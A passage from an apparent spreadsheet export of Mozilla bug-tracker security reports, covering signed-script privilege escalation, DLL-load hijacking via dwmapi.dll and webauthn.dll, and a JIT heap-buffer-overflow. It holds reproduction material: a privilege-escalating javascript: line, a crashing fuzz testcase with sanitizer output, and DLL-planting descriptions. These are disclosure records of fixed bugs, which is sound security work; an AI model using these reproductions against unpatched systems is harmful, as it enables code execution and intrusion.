          <t>[sg:critical] against sites who used signed JS [fixed-in-tracemonkey]</t>
        </is>
      </c>
      <c r="Q2093" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2093" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2093" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2093" t="n">
        <v>1</v>
      </c>
      <c r="U2093" t="n">
        <v>0</v>
      </c>
      <c r="V2093" t="n">
        <v>22</v>
      </c>
      <c r="W2093" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
It is possible for unsigned scripts to call functions inside signed scripts on the same host and thus possibly execute code using expanded privileges. Possibly a regression from Firefox 3.6.
Reproducible: Always
Steps to Reproduce:
1. go to http://ebenda.org/2011/signed.call/
2. click link
Actual Results:  
Function a() inside signed jar is executed from unsinged page.
Expected Results:  
Exception is raised.
Like Firefox 3.6.17 does: "Fehler: &lt;http://ebenda.org&gt; wurde die Erlaubnis für das Lesen der Eigenschaft Window.a verweigert.
Quelldatei: javascript:alert(window.frames[0].a('netscape.security.PrivilegeManager.enablePrivilege(\'UniversalXPConnect\');Components.classes[\'@mozilla.org/xre/app-info;1\'].getService(Components.interfaces.nsIXULRuntime).OS'));
Zeile: 1"
If privileges were granted to signer of the signed jar permanently before executing the attack, no confirmation dialog will occur.</t>
        </is>
      </c>
      <c r="X2093" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" t="n">
        <v>322312</v>
      </c>
      <c r="B2094" t="inlineStr">
        <is>
          <t>2006-01-04 00:09:22 -0800</t>
        </is>
      </c>
      <c r="C2094" t="inlineStr">
        <is>
          <t>CVE-2006-0299 * ("AnyName") entrainment and (given future chrome use of e4x) access control hazard</t>
        </is>
      </c>
      <c r="D2094" t="inlineStr">
        <is>
          <t>2006-02-02 09:33:03 -0800</t>
        </is>
      </c>
      <c r="E2094" t="n">
        <v>1</v>
      </c>
      <c r="F2094" t="n">
        <v>1</v>
      </c>
      <c r="G2094" t="n">
        <v>3</v>
      </c>
      <c r="H2094" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2094" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2094" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2094" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2094" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2094" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2094" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2094" t="inlineStr">
        <is>
          <t>[sg:low (preventive)] patch in bug 322499 (fixed on trunk)</t>
        </is>
      </c>
      <c r="Q2094" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2094" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2094" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2094" t="n">
        <v>1</v>
      </c>
      <c r="U2094" t="n">
        <v>0</v>
      </c>
      <c r="V2094" t="n">
        <v>22</v>
      </c>
      <c r="W2094" t="inlineStr">
        <is>
          <t>The E4X AnyName spec type is implemented in SpiderMonkey using a native object class, but its only instance is a per-runtime singleton managed via a weak ref in the JSRuntime.
Bugs in the implementation expose this instance to script directly and via AnyName(), new AnyName(), and AnyName.prototype, whose __proto__  leads to the first accessing context global's Object.prototype, leading via __parent__ to a window.  If chrome uses * in a script loaded and cached across a long term, content script might be able to do naughty things.
Apart from access control concerns, the first context to use * in an overlapping episode of * usage will have its global object entrained via the AnyName singleton's prototype object, that context global's Object.prototype.  This is a bloat bug.
/be</t>
        </is>
      </c>
      <c r="X2094" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" t="n">
        <v>579593</v>
      </c>
      <c r="B2095" t="inlineStr">
        <is>
          <t>2010-07-16 18:29:58 -0700</t>
        </is>
      </c>
      <c r="C2095" t="inlineStr">
        <is>
          <t>Windows XP "dwmapi.dll" Dll-load Vulnerability (FG-VD-10-022)</t>
        </is>
      </c>
      <c r="D2095" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:16 -0700</t>
        </is>
      </c>
      <c r="E2095" t="n">
        <v>1</v>
      </c>
      <c r="F2095" t="n">
        <v>1</v>
      </c>
      <c r="G2095" t="n">
        <v>3</v>
      </c>
      <c r="H2095" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2095" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2095" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K2095" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2095" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2095" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2095" t="inlineStr">
        <is>
          <t>[sg:critical] [not entirely local]</t>
        </is>
      </c>
      <c r="Q2095" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2095" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2095" t="inlineStr">
        <is>
          <t>mozilla2.0b4</t>
        </is>
      </c>
      <c r="T2095" t="n">
        <v>1</v>
      </c>
      <c r="U2095" t="n">
        <v>0</v>
      </c>
      <c r="V2095" t="n">
        <v>50</v>
      </c>
      <c r="W2095" t="inlineStr">
        <is>
          <t>Created attachment 458030
PoC
Haifei Li of Fortinet's FortiGuard Labs submitted the following advisory to security@. The video is too large to attach, so if you need it, contact me OOB.
==============================================================================
//NOTE: The following vulnerability information is a part of the pending-released paper from the author regarding the Dll-load attack research. Additional information (PoC, reproduce video) is attached as well.
//We recommend you fix this issue as soon as possible since we are going the release our paper including all the details of this vulnerability in the near future. If you have any concerns let us know, we would like to work with you resolve this issue.
by Haifei Li of Fortinet's FortiGuard Labs (hfli@fortinet.com)
2. Mozilla Firefox on Windows XP "dwmapi.dll" Dll-load Vulnerability
Confirmed Affected Conditions:
Mozilla Firefox 3.6.6 on Windows XP SP3
Description:
When opening a html file with Firefox directly (by double-clicking on the file, for example, Firefox is the default web browser), Firefox will try to load a dll named "dwmapi.dll" in the system. This "dwmapi.dll" is a system dll on Windows editions after Windows XP such as Windows Vista and Windows 7. However, on Windows XP there is no such a dll. Thus, if the attacker put a malicious "dwmapi.dll" at the same directory of the html file, malicious code will be executed when opening the html file by Firefox.
This dll-loading process is done by LoadLibrary in “xul.dll” as the following codes:
.text:10253717          push    	offset s_Dwmapi_dll 	; "dwmapi.dll"
.text:1025371C          call    	edi ; LoadLibraryW
Thus, it follows the SSO. The following detailed search order also shows the point (in the case that “dwmapi.dll” does not exist in the system, “C:\firefox” is the CWD):
C:\Program Files\Mozilla Firefox\dwmapi.dll		NOT FOUND
C:\WINDOWS\system32\dwmapi.dll			NOT FOUND
C:\WINDOWS\system\dwmapi.dll				NOT FOUND
C:\WINDOWS\dwmapi.dll					NOT FOUND
C:\firefox\dwmapi.dll						NOT FOUND
C:\Program Files\Mozilla Firefox\dwmapi.dll		NOT FOUND
C:\WINDOWS\system32\dwmapi.dll			NOT FOUND
C:\WINDOWS\dwmapi.dll					NOT FOUND
C:\WINDOWS\System32\Wbem\dwmapi.dll		NOT FOUND
On the development side:
We could infer that in the developing/testing process of Firefox, the vendor used highly-version Windows as their testing environment, they did not realize that their loading-dll could be non-exist on other platforms.
This case suggests that vendor should test their product on all the platforms that their product could run on.
A middle course is that putting the system dll in the application directory when installing, however, this requires that if the system dll is updated by Microsoft for security problems in future, the 3rd party vendor should also update the dll with Microsoft to ensure the safety of their product.</t>
        </is>
      </c>
      <c r="X2095" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" t="n">
        <v>783867</v>
      </c>
      <c r="B2096" t="inlineStr">
        <is>
          <t>2012-08-19 03:03:47 -0700</t>
        </is>
      </c>
      <c r="C2096" t="inlineStr">
        <is>
          <t>ASSERTION: This only works on nsISupports classes! and segfault</t>
        </is>
      </c>
      <c r="D2096" t="inlineStr">
        <is>
          <t>2024-05-30 07:32:26 -0700</t>
        </is>
      </c>
      <c r="E2096" t="n">
        <v>1</v>
      </c>
      <c r="F2096" t="n">
        <v>1</v>
      </c>
      <c r="G2096" t="n">
        <v>3</v>
      </c>
      <c r="H2096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2096" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2096" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2096" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2096" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q2096" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2096" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2096" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2096" t="n">
        <v>1</v>
      </c>
      <c r="U2096" t="n">
        <v>0</v>
      </c>
      <c r="V2096" t="n">
        <v>10</v>
      </c>
      <c r="W2096" t="inlineStr">
        <is>
          <t>Running
new Worker("http://base.com") instanceof Components.interfaces.nsIArray
in a mochitest will hit
NS_ASSERTION(mozilla::dom::DOMJSClass::FromJSClass(
                  js::GetObjectJSClass(obj))-&gt;mDOMObjectIsISupports,
             "This only works on nsISupports classes!");
at &lt;http://mxr.mozilla.org/mozilla-central/source/js/xpconnect/src/XPCJSID.cpp#484&gt;. We then unwrap the object to nsISupports and try to call QueryInterface on it, and segfault in nsWrapperCache::WrapObject.</t>
        </is>
      </c>
      <c r="X2096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" t="n">
        <v>1642400</v>
      </c>
      <c r="B2097" t="inlineStr">
        <is>
          <t>2020-06-01 10:36:22 -0700</t>
        </is>
      </c>
      <c r="C2097" t="inlineStr">
        <is>
          <t>DLL Hijacking via webauthn.dll</t>
        </is>
      </c>
      <c r="D2097" t="inlineStr">
        <is>
          <t>2024-05-30 10:15:07 -0700</t>
        </is>
      </c>
      <c r="E2097" t="n">
        <v>1</v>
      </c>
      <c r="F2097" t="n">
        <v>1</v>
      </c>
      <c r="G2097" t="n">
        <v>3</v>
      </c>
      <c r="H2097" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2097" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2097" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K2097" t="inlineStr">
        <is>
          <t>76 Branch</t>
        </is>
      </c>
      <c r="L2097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2097" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2097" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?][post-critsmash-triage][adv-main78+]</t>
        </is>
      </c>
      <c r="Q2097" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2097" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2097" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T2097" t="n">
        <v>1</v>
      </c>
      <c r="U2097" t="n">
        <v>0</v>
      </c>
      <c r="V2097" t="n">
        <v>18</v>
      </c>
      <c r="W2097" t="inlineStr">
        <is>
          <t>Created attachment 9153184
Procmon Output after installing Firefox
A DLL hijacking vulnerability was found in the Firefox Windows version. An attacker that obtained access to the victim system would be able to use this vulnerability to maintain persistence or evade defences. 
More specifically, the webauthn.dll DLL was found to be missing and it was possible to hijack it by creating a DLL with the same name in one of the directories within the %PATH% variable. 
Additionally, just right after the installation process, the process firefox.exe was looking in the %APPDATA%\Local\Microsoft\WindowsApps directory for the aforementioned DLL (see attached screenshot). The directory is usually writable by the current user and it's outside the %PATH% variable, meaning that even without ACL misconfiguration (being able to write in a folder within the %PATH%) it would still be possible to execute code in this way.
This was tested with Firefox version 76.0.1</t>
        </is>
      </c>
      <c r="X2097" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" t="n">
        <v>1172076</v>
      </c>
      <c r="B2098" t="inlineStr">
        <is>
          <t>2015-06-05 11:28:00 -0700</t>
        </is>
      </c>
      <c r="C2098" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::RValueAllocation::index() const] with heap-buffer-overflow</t>
        </is>
      </c>
      <c r="D2098" t="inlineStr">
        <is>
          <t>2022-10-27 12:37:45 -0700</t>
        </is>
      </c>
      <c r="E2098" t="n">
        <v>1</v>
      </c>
      <c r="F2098" t="n">
        <v>1</v>
      </c>
      <c r="G2098" t="n">
        <v>3</v>
      </c>
      <c r="H2098" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2098" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2098" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2098" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2098" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2098" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2098" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2098" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2098" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2098" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2098" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2098" t="n">
        <v>1</v>
      </c>
      <c r="U2098" t="n">
        <v>0</v>
      </c>
      <c r="V2098" t="n">
        <v>31</v>
      </c>
      <c r="W2098" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 98820360ab66 (build with --enable-gczeal --enable-optimize="-O2 -g" --enable-address-sanitizer --enable-posix-nspr-emulation --disable-jemalloc --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2 --ion-eager):
function f() {
  return f.caller.p;
}
var lfGlobal = newGlobal();
for (lfLocal in this) { 
    if (!(lfLocal in lfGlobal)) { 
        lfGlobal[lfLocal] = this[lfLocal]; 
    }
}
function dummy() {
  test();
  function test() {
    function t(o, proplist) { var obj_12 = f("get"); }
    t();
    test()
  }
}
lfGlobal.offThreadCompileScript(dummy.toSource() + "dummy();");
lfGlobal.runOffThreadScript();
Backtrace:
==43399==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200003ad00 at pc 0x1093b32 bp 0x7fff0a7c3a00 sp 0x7fff0a7c39f8
READ of size 8 at 0x60200003ad00 thread T0
    #0 0x1093b31 in js::jit::RValueAllocation::index() const js/src/jit/JitFrames.cpp:2267
    #1 0x1093b31 in js::jit::SnapshotIterator::allocationValue(js::jit::RValueAllocation const&amp;, js::jit::SnapshotIterator::ReadMethod) js/src/jit/JitFrames.cpp:1995
    #2 0x109a9f4 in js::jit::InlineFrameIterator::callee(js::jit::MaybeReadFallback&amp;) const js/src/jit/JitFrames.cpp:2509
    #3 0xaf4dfc in js::FrameIter::callee(JSContext*) const js/src/vm/Stack.cpp:1108
    #4 0x14c4d67 in CallerGetterImpl(JSContext*, JS::CallArgs) js/src/jsfun.cpp:265
    #5 0x164b4a3 in bool JS::CallNonGenericMethod&lt;&amp;(IsFunction(JS::Handle&lt;JS::Value&gt;)), &amp;(CallerGetterImpl(JSContext*, JS::CallArgs))&gt;(JSContext*, JS::CallArgs) js/src/opt64asan/js/src/../../dist/include/js/CallNonGenericMethod.h:100
    #6 0x164b4a3 in CallerGetter(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:297
    #7 0xd88038 in js::jit::DoCallNativeGetter(JSContext*, JS::Handle&lt;JSFunction*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/BaselineIC.cpp:1618
0x60200003ad00 is located 0 bytes to the right of 16-byte region [0x60200003acf0,0x60200003ad00)
allocated by thread T0 here:
    #0 0x4af3f7 in __interceptor_malloc /srv/repos/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x10c2cb8 in js_malloc(unsigned long) js/src/opt64asan/js/src/../../dist/include/js/Utility.h:126
    #2 0x10c2cb8 in _ZL13js_pod_mallocIN2js14RelocatablePtrIN2JS5ValueEEEEPT_m js/src/opt64asan/js/src/../../dist/include/js/Utility.h:281
    #3 0x10c2cb8 in js::RelocatablePtr&lt;JS::Value&gt;* js::SystemAllocPolicy::pod_malloc&lt;js::RelocatablePtr&lt;JS::Value&gt; &gt;(unsigned long) js/src/jsalloc.h:34
    #4 0x10c2cb8 in mozilla::VectorBase&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy, mozilla::Vector&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy&gt; &gt;::convertToHeapStorage(unsigned long) js/src/opt64asan/js/src/../../dist/include/mozilla/Vector.h:772
    #5 0x10c2cb8 in mozilla::VectorBase&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy, mozilla::Vector&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy&gt; &gt;::growStorageBy(unsigned long) js/src/opt64asan/js/src/../../dist/include/mozilla/Vector.h:863
    #6 0x1091fa1 in mozilla::UniquePtr&lt;mozilla::Vector&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy&gt;, JS::DeletePolicy&lt;mozilla::Vector&lt;js::RelocatablePtr&lt;JS::Value&gt;, 1ul, js::SystemAllocPolicy&gt; &gt; &gt;::operator bool() const js/src/opt64asan/js/src/../../dist/include/mozilla/Vector.h:924
    #7 0x1091fa1 in js::jit::RInstructionResults::init(JSContext*, unsigned int) js/src/jit/JitFrames.cpp:1711
    #8 0x10957d6 in js::jit::SnapshotIterator::computeInstructionResults(JSContext*, js::jit::RInstructionResults*) const js/src/jit/JitFrames.cpp:2222
    #9 0x10948b6 in js::jit::SnapshotIterator::initInstructionResults(js::jit::MaybeReadFallback&amp;) js/src/jit/JitFrames.cpp:2199
    #10 0x1093fc8 in js::jit::SnapshotIterator::maybeRead(js::jit::RValueAllocation const&amp;, js::jit::MaybeReadFallback&amp;) js/src/jit/JitFrames.cpp:2026
    #11 0x109a9f4 in js::jit::InlineFrameIterator::callee(js::jit::MaybeReadFallback&amp;) const js/src/jit/JitFrames.cpp:2509
    #12 0xaf4dfc in js::FrameIter::callee(JSContext*) const js/src/vm/Stack.cpp:1108
    #13 0x14c4d67 in CallerGetterImpl(JSContext*, JS::CallArgs) js/src/jsfun.cpp:265
    #14 0x164b4a3 in bool JS::CallNonGenericMethod&lt;&amp;(IsFunction(JS::Handle&lt;JS::Value&gt;)), &amp;(CallerGetterImpl(JSContext*, JS::CallArgs))&gt;(JSContext*, JS::CallArgs) js/src/opt64asan/js/src/../../dist/include/js/CallNonGenericMethod.h:100
    #15 0x164b4a3 in CallerGetter(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:297
    #16 0xd88038 in js::jit::DoCallNativeGetter(JSContext*, JS::Handle&lt;JSFunction*&gt;, JS::Handle&lt;JSObject*&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/BaselineIC.cpp:1618
    #17 0xe4134d in EnterBaseline(JSContext*, js::jit::EnterJitData&amp;) js/src/jit/BaselineJIT.cpp:124
    #18 0xe40c8d in js::jit::EnterBaselineMethod(JSContext*, js::RunState&amp;) js/src/jit/BaselineJIT.cpp:156
    #19 0x91e959 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:642
    #20 0x8ff70a in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:722
    #21 0x8b3986 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:759
    #22 0x16ad835 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const js/src/proxy/DirectProxyHandler.cpp:77
    #23 0x16ad835 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const js/src/proxy/CrossCompartmentWrapper.cpp:289
    #24 0x16beb6e in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/proxy/Proxy.cpp:391
    #25 0x16c1d84 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/proxy/Proxy.cpp:697
    #26 0x8ff14f in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) js/src/jscntxtinlines.h:235
    #27 0x8ff14f in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:695
    #28 0x8b3986 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:759
    #29 0x1315c6a in js::jit::InvokeFunction(JSContext*, JS::Handle&lt;JSObject*&gt;, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/VMFunctions.cpp:75
SUMMARY: AddressSanitizer: heap-buffer-overflow js/src/jit/JitFrames.cpp:2267 js::jit::RValueAllocation::index() const
Shadow bytes around the buggy address:
  0x0c047ffff550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047ffff560: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047ffff570: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047ffff580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047ffff590: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 00 00
=&gt;0x0c047ffff5a0:[fa]fa fd fa fa fa 00 05 fa fa fd fa fa fa fd fd
  0x0c047ffff5b0: fa fa 00 07 fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047ffff5c0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 01
  0x0c047ffff5d0: fa fa fd fd fa fa 00 fa fa fa fd fd fa fa fd fd
  0x0c047ffff5e0: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa fd fd
  0x0c047ffff5f0: fa fa fd fa fa fa 00 07 fa fa 00 00 fa fa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43399==ABORTING
Marking s-s and sec-critical due to heap-buffer-overflow.</t>
        </is>
      </c>
      <c r="X2098" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" t="n">
        <v>506147</v>
      </c>
      <c r="B2099" t="inlineStr">
        <is>
          <t>2009-07-23 17:12:15 -0700</t>
        </is>
      </c>
      <c r="C2099" t="inlineStr">
        <is>
          <t>Passphrase not verified when setting up another computer</t>
        </is>
      </c>
      <c r="D2099" t="inlineStr">
        <is>
          <t>2009-08-26 20:21:18 -0700</t>
        </is>
      </c>
      <c r="E2099" t="n">
        <v>1</v>
      </c>
      <c r="F2099" t="n">
        <v>1</v>
      </c>
      <c r="G2099" t="n">
        <v>2</v>
      </c>
      <c r="H2099" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2099" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J2099" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2099" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2099" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2099" t="inlineStr"/>
      <c r="Q2099" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2099" t="inlineStr">
        <is>
          <t>0.7</t>
        </is>
      </c>
      <c r="T2099" t="n">
        <v>1</v>
      </c>
      <c r="U2099" t="n">
        <v>0</v>
      </c>
      <c r="V2099" t="n">
        <v>6</v>
      </c>
      <c r="W2099" t="inlineStr">
        <is>
          <t>Currently we just pass null to verifyLogin to skip the passphrase check, but if the user is setting up another computer, most likely the user already has synced and has the pub/priv key on the server.
Also with bug 506141 fixed, there should be no reason to pass null.</t>
        </is>
      </c>
      <c r="X2099" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2100">
      <c r="A2100" t="n">
        <v>1212356</v>
      </c>
      <c r="B2100" t="inlineStr">
        <is>
          <t>2015-10-07 07:37:35 -0700</t>
        </is>
      </c>
      <c r="C2100" t="inlineStr">
        <is>
          <t>crash in js::PreliminaryObjectArray::sweep()</t>
        </is>
      </c>
      <c r="D2100" t="inlineStr">
        <is>
          <t>2017-01-05 09:12:58 -0800</t>
        </is>
      </c>
      <c r="E2100" t="n">
        <v>1</v>
      </c>
      <c r="F2100" t="n">
        <v>1</v>
      </c>
      <c r="G2100" t="n">
        <v>3</v>
      </c>
      <c r="H2100" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2100" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2100" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K2100" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2100" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2100" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N2100" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2100" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2100" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q2100" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2100" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2100" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2100" t="n">
        <v>1</v>
      </c>
      <c r="U2100" t="n">
        <v>0</v>
      </c>
      <c r="V2100" t="n">
        <v>20</v>
      </c>
      <c r="W2100" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-f43103aa-365d-4657-889e-81d3e2151007.
=============================================================
Came back to this crash. Not sure how to repro. Does the callstack show anything relevant?</t>
        </is>
      </c>
      <c r="X2100" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" t="n">
        <v>688208</v>
      </c>
      <c r="B2101" t="inlineStr">
        <is>
          <t>2011-09-21 10:31:51 -0700</t>
        </is>
      </c>
      <c r="C2101" t="inlineStr">
        <is>
          <t>nsWindow for Android doesn't check whether the instance is destroying or not after dispatching an event</t>
        </is>
      </c>
      <c r="D2101" t="inlineStr">
        <is>
          <t>2021-11-04 12:13:25 -0700</t>
        </is>
      </c>
      <c r="E2101" t="n">
        <v>1</v>
      </c>
      <c r="F2101" t="n">
        <v>1</v>
      </c>
      <c r="G2101" t="n">
        <v>6</v>
      </c>
      <c r="H2101" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2101" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2101" t="inlineStr">
        <is>
          <t>Widget: Android</t>
        </is>
      </c>
      <c r="K2101" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
